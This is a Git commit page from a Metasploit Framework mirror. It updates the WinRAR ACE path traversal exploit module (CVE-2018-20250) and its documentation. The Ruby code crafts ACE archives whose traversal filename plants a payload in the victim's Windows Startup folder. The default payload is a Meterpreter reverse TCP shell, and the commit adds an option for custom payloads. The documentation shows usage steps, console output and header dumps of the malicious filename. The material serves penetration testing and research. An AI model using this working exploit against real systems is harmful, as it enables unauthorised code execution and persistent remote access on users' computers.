infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Allow user to use a file of their own choosing. 

Updates to documentation and some comments in the module.
master
Imran E. Dawoodjee 2019-04-17 00:18:27 +08:00
parent 6c798221fb
commit 6676dcb2ec
No known key found for this signature in database
GPG Key ID: C624AF1BC0AFB44B
2 changed files with 198 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

160
documentation/modules/exploit/windows/fileformat/winrar_ace.md
View File

@ -1,14 +1,10 @@
## Introduction
From the CVE-2018-20250 NVD Page:
In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability when crafting the filename field
of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination
(extraction) folder is ignored, thus treating the filename as an absolute path.
**From the CVE-2018-20250 NVD Page**:
In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.
This module will attempt to extract a payload to the startup folder of the current user. It is limited such that we can only go back one folder. Therefore, for this exploit to work properly, the user must extract the supplied RAR file from one folder within the user profile folder (e.g. Desktop or Downloads).
This module will attempt to extract a payload to the startup folder of the current user. It is limited such that we can
only go back one folder. Therefore, for this exploit to work properly, the user must extract the supplied RAR file from
one folder within the user profile folder (e.g. Desktop or Downloads).
## Vulnerable Applications
- RARLAB WinRAR <= 5.61
@ -17,20 +13,154 @@ one folder within the user profile folder (e.g. Desktop or Downloads).
1. Start msfconsole
2. Do: `use exploit/windows/fileformat/winrar_ace`
3. Do: `set FILENAME [FILENAME]`. Name is "msf.ace" by default
4. Do: `exploit`
5. **Verify** that a file is created (by default in "~/.msf4/local/")
3. Do: `set FILENAME [FILENAME]`. Name is `msf.ace` by default.
4. Optional: Do: `set CUSTFILE [CUSTFILE]` to use a custom payload.
5. Optional: Do: `set PAYLOAD [PAYLOAD]`. `windows/meterpreter/reverse_tcp` by default. Skip if using a custom payload.
6. Configure your payload if using a Metasploit-provided payload. Skip if using a custom payload.
7. Do: `exploit`
8. **Verify** that a file is created (by default in `~/.msf4/local/`) and that it passes `**acefile.py**`'s checks
## Options
### FILENAME
Filename to output
**FILENAME**
Filename to output. Default is `msf.ace`
**CUSTFILE**
Optional. Custom payload to use. Can be anything. Just be aware that some files are not *meant* to be executed in case you're wondering why the shellz ain't poppin'.
## Example
### Test with autogenerated payload, default options
```
msf5 exploit(windows/fileformat/winrar_ace) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1
LHOST => 172.16.79.1
msf5 exploit(windows/fileformat/winrar_ace) > exploit
[+] msf.ace stored at /home/msfdev/.msf4/local/msf.ace
[*] ACE header CRC16: 0x286b
[*] Filename: YqJotG.exe
[*] Payload CRC32: 0x890ed96f
[*] File header CRC16: 0x55e7
[+] msf.ace stored at /home/msfdev2/.msf4/local/msf.ace
msf5 exploit(windows/fileformat/winrar_ace) >
```
Verify checksums using `acefile`:
```
msfdev2@automata:~$ python3 acefile.py --headers .msf4/local/msf.ace -v
warning: acebitstream c extension unavailable, using pure-python bit stream
processing archive .msf4/local/msf.ace
loaded 1 volume(s) starting at volume 0
archive is not locked, not multi-volume, solid
last modified 2019-02-22 03:00:32
created on Win32 with ACE 2.0 for extraction with 2.0+
advert [*UNREGISTERED VERSION*]
volume
filename .msf4/local/msf.ace
filesize 73972
headers MAIN:1 FILE:1 others:0
header
hdr_crc 0x286b
hdr_size 49
hdr_type 0x00 MAIN
hdr_flags 0x9000 ADVERT|SOLID
magic b'**ACE**'
eversion 20 2.0
cversion 20 2.0
host 0x02 Win32
volume 0
datetime 0x4e561810 2019-02-22 03:00:32
reserved1 97 4f f6 aa 00 00 00 00
advert b'*UNREGISTERED VERSION*'
comment b''
reserved2 b''
header
hdr_crc 0x55e7
hdr_size 113
hdr_type 0x01 FILE32
hdr_flags 0x8001 ADDSIZE|SOLID
packsize 73802
origsize 73802
datetime 0x4e55b063 2019-02-21 22:03:06
attribs 0x20000000 536870912
crc32 0x890ed96f
comptype 0x00 stored
compqual 0x03 normal
params 0x000a
reserved1 0x4554
filename b'C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YqJotG.exe'
comment b''
ntsecurity b''
reserved2 b''
msfdev2@automata:~$
```
### Test using a custom payload and saving to a different filename
```
msf5 exploit(windows/fileformat/winrar_ace) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/asdfasdf.txt
CUSTFILE => /home/msfdev2/asdfasdf.txt
msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME custom.ace
FILENAME => custom.ace
msf5 exploit(windows/fileformat/winrar_ace) > exploit
[*] ACE header CRC16: 0x286b
[*] Using a custom payload: /home/msfdev2/asdfasdf.txt
[*] Filename: asdfasdf.txt
[*] Payload CRC32: 0x90117b38
[*] File header CRC16: 0x2cdd
[+] custom.ace stored at /home/msfdev2/.msf4/local/custom.ace
msf5 exploit(windows/fileformat/winrar_ace) >
```
Payload is named `asdfasdf.txt` and contains `asdfasdf`. Verify checksums using `acefile`:
```
msfdev2@automata:~$ python3 acefile.py --headers .msf4/local/custom.ace -v
warning: acebitstream c extension unavailable, using pure-python bit stream
processing archive .msf4/local/custom.ace
loaded 1 volume(s) starting at volume 0
archive is not locked, not multi-volume, solid
last modified 2019-02-22 03:00:32
created on Win32 with ACE 2.0 for extraction with 2.0+
advert [*UNREGISTERED VERSION*]
volume
filename .msf4/local/custom.ace
filesize 181
headers MAIN:1 FILE:1 others:0
header
hdr_crc 0x286b
hdr_size 49
hdr_type 0x00 MAIN
hdr_flags 0x9000 ADVERT|SOLID
magic b'**ACE**'
eversion 20 2.0
cversion 20 2.0
host 0x02 Win32
volume 0
datetime 0x4e561810 2019-02-22 03:00:32
reserved1 97 4f f6 aa 00 00 00 00
advert b'*UNREGISTERED VERSION*'
comment b''
reserved2 b''
header
hdr_crc 0x2cdd
hdr_size 115
hdr_type 0x01 FILE32
hdr_flags 0x8001 ADDSIZE|SOLID
packsize 9
origsize 9
datetime 0x4e55b063 2019-02-21 22:03:06
attribs 0x20000000 536870912
crc32 0x90117b38
comptype 0x00 stored
compqual 0x03 normal
params 0x000a
reserved1 0x4554
filename b'C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\asdfasdf.txt'
comment b''
ntsecurity b''
reserved2 b''
msfdev2@automata:~$
```

92
modules/exploits/windows/fileformat/winrar_ace.rb
View File

@ -2,7 +2,6 @@
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
@ -27,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'Nadav Grossman', # exploit discovery
'Imran E. Dawoodjee' # Metasploit module
'Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>' # Metasploit module
],
'References' =>
[
@ -39,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'],
],
'Platform' => 'win',
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
'Targets' =>
[
[ 'RARLAB WinRAR <= 5.61', {} ]
@ -48,9 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ace'])
# allow operator to specify file to be extracted. WIP
# OptString.new('FILEPATH', [ true, 'The file to be extracted to Startup', ''])
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ace']),
OptString.new('CUSTFILE', [ false, 'User-defined custom file', ''])
])
end
@ -94,49 +93,53 @@ class MetasploitModule < Msf::Exploit::Remote
ace_header_crc16 = [ace_header_crc16].pack("v")
ace_header[0,2] = ace_header_crc16.to_s
#if datastore["FILEPATH"].nil?
# payload = generate_payload_exe
#else
# read user file to get payload
#end
# generate the payload, or get it from a user-defined path
if datastore["CUSTFILE"].empty?
payload = generate_payload_exe
exe_filename = ""
# 72 characters
exe_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
# 6 characters
exe_filename << rand_text_alpha(6)
# 4 characters
exe_filename << ".exe"
else
payload = get_custom_file(datastore["CUSTFILE"])
exe_filename = ""
# 72 characters
exe_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
# n characters
exe_filename << ::File.basename(datastore["CUSTFILE"])
end
vprint_status("Filename: #{exe_filename.from(72)}")
# calculate the CRC32 of the payload
payload = generate_payload_exe
payload_crc32 = crc32(payload).to_i
vprint_status("Payload CRC32: 0x#{payload_crc32.to_s(16)}")
payload_crc32 = [payload_crc32].pack("V")
exe_filename = ""
# 72 characters
exe_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
# 6 characters
exe_filename << rand_text_alpha(6)
# 4 characters
exe_filename << ".exe"
file_header = ""
# HEAD_CRC: Lower 2 bytes of CRC32 of 113 bytes of header after HEAD_TYPE.
# HEAD_CRC: Lower 2 bytes of CRC32 of the next bytes of header after HEAD_TYPE.
# The bogus value for HEAD_CRC will be replaced later.
file_header << "AA"
# HEAD_SIZE: file header size. \x00\x71 says 113.
file_header << "\x71\x00"
# HEAD_SIZE: file header size.
file_header << [31 + exe_filename.length].pack("v")
# HEAD_TYPE: header type is 1.
file_header << "\x01"
# HEAD_FLAGS: header flags. \x01\x80 is ADDFILE|SOLID
# HEAD_FLAGS: header flags. \x01\x80 is ADDSIZE|SOLID.
file_header << "\x01\x80"
# PACK_SIZE: size when packed
# PACK_SIZE: size when packed.
file_header << [payload.length].pack("V")
# ORIG_SIZE: original size. Same as PACK_SIZE if payload is binary. I am assuming binary here.
# Make it able to change (WIP) in case the operator wants to specify a custom payload to use
# which could be compressed
# ORIG_SIZE: original size. Same as PACK_SIZE since no compression is *truly* taking place.
file_header << [payload.length].pack("V")
# FTIME: file date and time in MS-DOS format
file_header << "\x63\xB0\x55\x4E" ############
# file_header << "\xDE\xAD\xBE\xEF"
file_header << "\x63\xB0\x55\x4E"
# ATTR: DOS/Windows file attribute bit field, as int, as produced by the Windows GetFileAttributes() API.
file_header << "\x00\x00\x00\x20"
# CRC32: CRC32 of the compressed file
file_header[23,27] = payload_crc32.to_s
file_header << [payload_crc32].pack("V")
# Compression type
file_header << "\x00"
# Compression quality
@ -145,9 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
file_header << "\x0A\x00"
# RESERVED1
file_header << "\x54\x45"
# FNAME_SIZE: size of filename string. Will always be 82 characters for this exploit (72 + 6 + 4)
file_header << "\x52\x00"
# FNAME: filename string
# FNAME_SIZE: size of filename string. Will be 82 characters by default (72 + 6 + 4)
file_header << [exe_filename.length].pack("v")
# FNAME: filename string. Empty for now. Fill in later.
file_header << exe_filename
# files stored in ACE archives each have their own header. For
@ -160,25 +163,36 @@ class MetasploitModule < Msf::Exploit::Remote
file_header_crc16 = [file_header_crc16].pack("v")
file_header[0,2] = file_header_crc16.to_s
# put everything together
ace_file = ""
ace_file << ace_header
ace_file << file_header
ace_file << payload
# create the file
file_create(ace_file)
end
# The CRC implementation used in ACE does not take the last step in calculating CRC32.
# That is, it does not flip the bits. Therefore, it can be easily calculated by taking
# the negative bitwise OR of the usual CRC and then subtracting one from it. This is due to
# the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so
# applying a bitwise OR on an integer will produce its negative + 1.
def crc32(data)
table = Zlib.crc_table
crc = 0xffffffff
data.unpack('C*').each { |b|
crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
}
# The CRC implementation used in ACE does not take the last step in calculating CRC32
# That is, it does reverse the bits. Therefore, it can be easily calculated by taking
# the negative bitwise OR of the CRC and then subtracting one from it. This is due to
# the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so
# applying a bitwise OR on an integer will produce its negative + 1.
-(~crc) - 1
end
# copypasta from lib/msf/core/exploit/exe.rb
def get_custom_file(path = nil)
path ||= datastore['CUSTFILE']
print_status("Using a custom payload: #{path}")
custom_file = nil
::File.open(path,'rb') {|f| custom_file = f.read(f.stat.size)}
custom_file
end
end